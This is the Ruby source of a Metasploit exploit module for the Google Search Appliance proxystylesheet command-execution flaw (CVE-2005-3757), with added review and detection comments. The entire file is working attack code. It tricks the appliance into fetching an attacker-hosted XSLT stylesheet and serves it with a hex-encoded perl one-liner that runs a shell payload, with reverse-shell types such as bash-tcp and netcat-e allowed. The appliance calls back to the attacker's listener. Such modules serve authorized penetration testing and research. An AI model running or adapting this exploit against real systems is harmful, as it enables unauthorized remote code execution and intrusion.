GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for the Google Search Appliance "proxystylesheet" issue
# (CVE-2005-3757). The module plays two roles at once: it is an HTTP
# client (sends the /search request to the appliance) and an HTTP server
# (hosts the XSLT document the appliance is told to fetch). The appliance
# therefore has to make an outbound connection back to SRVHOST:SRVPORT,
# which is also the most visible network indicator of an attempt.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  # Registers module metadata with the framework. Only the keys that are
  # not self-explanatory are annotated below.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Google Appliance ProxyStyleSheet Command Execution',
        'Description' => %q{
          This module exploits a feature in the Saxon XSLT parser used by
          the Google Search Appliance. This feature allows for arbitrary
          java methods to be called. Google released a patch and advisory to
          their client base in August of 2005 (GA-2005-08-m). The target appliance
          must be able to connect back to your machine for this exploit to work.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2005-3757'],
          ['OSVDB', '20981'],
          ['BID', '15509'],
        ],
        'Privileged' => false,
        'Payload' => {
          # The command payload is hex-encoded into a perl one-liner in
          # on_request_uri, so only cmd-style payloads are compatible.
          'DisableNops' => true,
          'Space' => 4000,
          'Compat' =>
          {
            'PayloadType' => 'cmd cmd_bash',
            'RequiredCmd' => 'generic perl bash-tcp telnet netcat netcat-e',
          }
        },
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [[ 'Automatic', {}]],
        'DisclosureDate' => '2005-08-16',
        # Aggressive: the module actively triggers the appliance to connect
        # back to the listener it starts, rather than waiting passively.
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Handle incoming requests from the appliance: serve the stylesheet
  # loaded by #exploit with the :x:MSF:x: placeholder replaced by the
  # command to run. Relies on @xml_data having been set by #exploit
  # before start_service is called; it is not populated anywhere else.
  #
  # @param cli [Object] the client connection passed by the HttpServer mixin
  # @param request [Object] the incoming request (not inspected here; every
  #   URI under resource_uri gets the same document)
  def on_request_uri(cli, request)
    print_status("Handling new incoming HTTP request...")

    # The payload is hex-encoded so that no shell metacharacters have to
    # survive the XSLT document; perl's pack("H*") decodes it at runtime.
    exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack("H*")[0] + '}))'
    data = @xml_data.gsub(/:x:MSF:x:/, exec_str)
    send_response(cli, data)
  end

  # Framework hook; this module always opts in (returns true).
  def autofilter
    true
  end

  # Vulnerability check. Sends a /search request whose proxystylesheet
  # points at a random, unresolvable hostname and inspects the error text
  # the appliance returns.
  #
  # @return [Exploit::CheckCode] Appears when the appliance tried to
  #   resolve the bogus stylesheet host, Safe otherwise
  def check
    # All variable parameters are 1..15 random alphabetic characters.
    res = send_request_cgi({
      'uri' => '/search',
      'vars_get' =>
      {
        'client' => rand_text_alpha(rand(15) + 1),
        'site' => rand_text_alpha(rand(15) + 1),
        'output' => 'xml_no_dtd',
        'q' => rand_text_alpha(rand(15) + 1),
        'proxystylesheet' => 'http://' + rand_text_alpha(rand(15) + 1) + '/'
      }
    }, 10)

    # A DNS failure message means the appliance attempted to fetch the
    # attacker-supplied stylesheet, i.e. the fetch path is reachable.
    if (res and res.body =~ /cannot be resolved to an ip address/)
      vprint_status("This system appears to be vulnerable")
      return Exploit::CheckCode::Appears
    end

    if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/)
      vprint_status("This system appears to be patched")
    end

    # NOTE(review): a nil res (no response at all) also falls through to
    # Safe; Exploit::CheckCode::Unknown would describe that case more
    # honestly.
    return Exploit::CheckCode::Safe
  end

  # Main flow: load the stylesheet template, learn the appliance's site
  # and client IDs from its redirect, start the local web server, then
  # ask the appliance to render a search with our stylesheet.
  def exploit
    # load the xml data
    # NOTE(review): File.binread(path) would be the exception-safe
    # equivalent of this open/read/close sequence.
    path = File.join(Msf::Config.data_directory, "exploits", "google_proxystylesheet.xml")
    fd = File.open(path, "rb")
    @xml_data = fd.read(fd.stat.size)
    fd.close

    print_status("Obtaining the appliance site and client IDs...")
    # Send a HTTP/1.0 request to learn the site configuration; the
    # appliance is expected to answer with a redirect whose Location
    # header carries site= and client= parameters.
    res = send_request_raw({
      'uri' => '/',
      'version' => '1.0'
    }, 10)

    if !(res and res['location'] and res['location'] =~ /site=/)
      # NOTE(review): when res is nil this interpolation raises
      # NoMethodError instead of printing; res&.code / res&.message would
      # keep the early return reachable.
      print_status("Could not read the location header: #{res.code} #{res.message}")
      return
    end

    # Both parameters must be followed by '&' for the match to succeed.
    m = res['location'].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im)
    if !(m and m[1] and m[2])
      print_status("Invalid location header: #{res['location']}")
      return
    end

    # @xml_data is populated above, so the server may answer immediately.
    print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")
    start_service

    # The proxystylesheet URL points at this module's listener. From the
    # appliance side, a /search request whose proxystylesheet names a
    # host other than the appliance itself is the request-level indicator
    # of this technique.
    print_status("Requesting a search using our custom XSLT...")
    res = send_request_cgi({
      'uri' => '/search',
      'vars_get' =>
      {
        'client' => m[2],
        'site' => m[1],
        'output' => 'xml_no_dtd',
        'q' => rand_text_alpha(rand(15) + 1),
        'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
        'proxyreload' => '1'
      }
    }, 25)

    if (res)
      print_status("The server returned: #{res.code} #{res.message}")
      print_status("Waiting on the payload to execute...")
      # Kernel#select with no descriptors is used as a 20-second sleep so
      # the served stylesheet has time to be fetched and processed.
      select(nil, nil, nil, 20)
    else
      print_status("No response from the server")
    end
  end
end